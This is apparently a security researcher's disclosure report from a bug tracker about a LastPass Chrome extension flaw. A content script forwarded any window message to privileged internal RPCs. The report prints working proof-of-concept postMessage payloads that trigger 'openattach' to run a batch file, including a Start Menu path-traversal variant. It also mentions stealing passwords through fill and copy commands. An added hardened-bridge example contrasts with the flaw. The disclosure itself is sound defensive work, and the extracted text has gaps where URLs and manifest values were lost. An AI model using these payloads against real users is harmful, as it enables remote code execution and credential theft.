
Issue 1209

Issue metadata

Status: Fixed
Closed: Mar 2017


LastPass: websiteConnector.js content script allows proxying internal RPC commands

Project Member Reported by, Mar 20 2017

Issue description

I noticed this entry in the content_script array from the LastPass manifest:

			"matches": [
			"js": [
			"all_frames": true,
			"run_at": "document_end"

That's a content script that is only used for one specific domain, if we look at the script:

$ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js
window.addEventListener("message", function(e) { || chrome.runtime.sendMessage(, function(e) {});

That doesn't look good: this script will proxy unauthenticated window messages to the extension. This is clearly a mistake, because anybody can do

win ="");
win.postMessage({}, "*");

Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things like copying and filling in passwords (copypass, fillform, etc). If you install the binary component (, you can also use "openattach" to run arbitrary code.

For example, this will run calc.exe:

win ="");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:.bat"}, "*");

(This code will need to be inside an onclick handler to open a popup).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Attachment: Windows 7-2017-03-20-16-14-27.png (104 KB)
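For contrast with the forwarding pattern described above, here is what a hardened website-to-extension bridge looks like: it checks the message origin and source window and only forwards allow-listed commands instead of proxying the raw object. This is an added example, not LastPass code; the origin and command names are hypothetical placeholders.

```javascript
// Added example: a hardened postMessage -> chrome.runtime.sendMessage bridge.
// Not LastPass code. ALLOWED_ORIGIN and the command names are hypothetical.

const ALLOWED_ORIGIN = "https://app.example.invalid"; // the single origin this script serves
const ALLOWED_CMDS = new Set(["getLoginState"]);       // narrow allow-list; no fill/copy/open RPCs

// Builds a "message" listener. Dependencies are injected so the logic can be
// exercised outside a browser. Returns true only when a message was forwarded.
function makeBridge({ allowedOrigin, allowedCmds, selfWindow, sendMessage }) {
  return function onMessage(event) {
    // 1. A cross-origin opener/popup posting into this window fails here.
    if (event.origin !== allowedOrigin) return false;
    // 2. Only the page's own scripts (source === its window) may talk to us,
    //    not another window that merely holds a reference to this one.
    if (event.source !== selfWindow) return false;
    // 3. Require a structured request with an allow-listed command.
    const req = event.data;
    if (!req || typeof req !== "object" || typeof req.cmd !== "string") return false;
    if (!allowedCmds.has(req.cmd)) return false;
    // 4. Forward a freshly built message, never the attacker-controlled object,
    //    so fields like fromExtension cannot be spoofed from the page.
    sendMessage({ fromWebsite: true, cmd: req.cmd });
    return true;
  };
}

// Wire it up when running as a real content script (guarded so the file also
// loads outside a page, e.g. under Node for the checks below).
if (typeof window !== "undefined" && typeof chrome !== "undefined" && chrome.runtime) {
  window.addEventListener("message", makeBridge({
    allowedOrigin: ALLOWED_ORIGIN,
    allowedCmds: ALLOWED_CMDS,
    selfWindow: window,
    sendMessage: (msg) => chrome.runtime.sendMessage(msg),
  }));
}
```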

Comment 1 Deleted

Project Member

Comment 2 by, Mar 21 2017

Ah, this version is better, it works without a prompt on Windows 10:

win ="");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

This requires that the user has enabled "Binary Component" (Click LastPass->More Options->About LastPass), but you can actually force LastPass to prompt the user to install it with another RPC.

Otherwise, you will have to settle for just stealing passwords :)

Comment 3 Deleted

Project Member

Comment 4 by, Mar 21 2017

LastPass responded and said they have NXDOMAIN'd while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

Nevertheless, disabling seems like a good enough mitigation for now.

Project Member

Comment 5 by, Mar 21 2017

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
I've uploaded the exploit here:

It looks like LastPass now consider this issue resolved:

Hopefully they have taken down the service and not just removed the DNS entry, or a mitm can still insert correct DNS responses. 

Additionally, if any corporate intercepting SSL proxy is returning custom error pages for NXDOMAIN, then this might still be exploitable; you should test the exploit if you think this might apply to you and contact your administrator if necessary.

Marking fixed.

(Please note, issue 1188, which affects LastPass on Firefox, is not fixed and still works.)
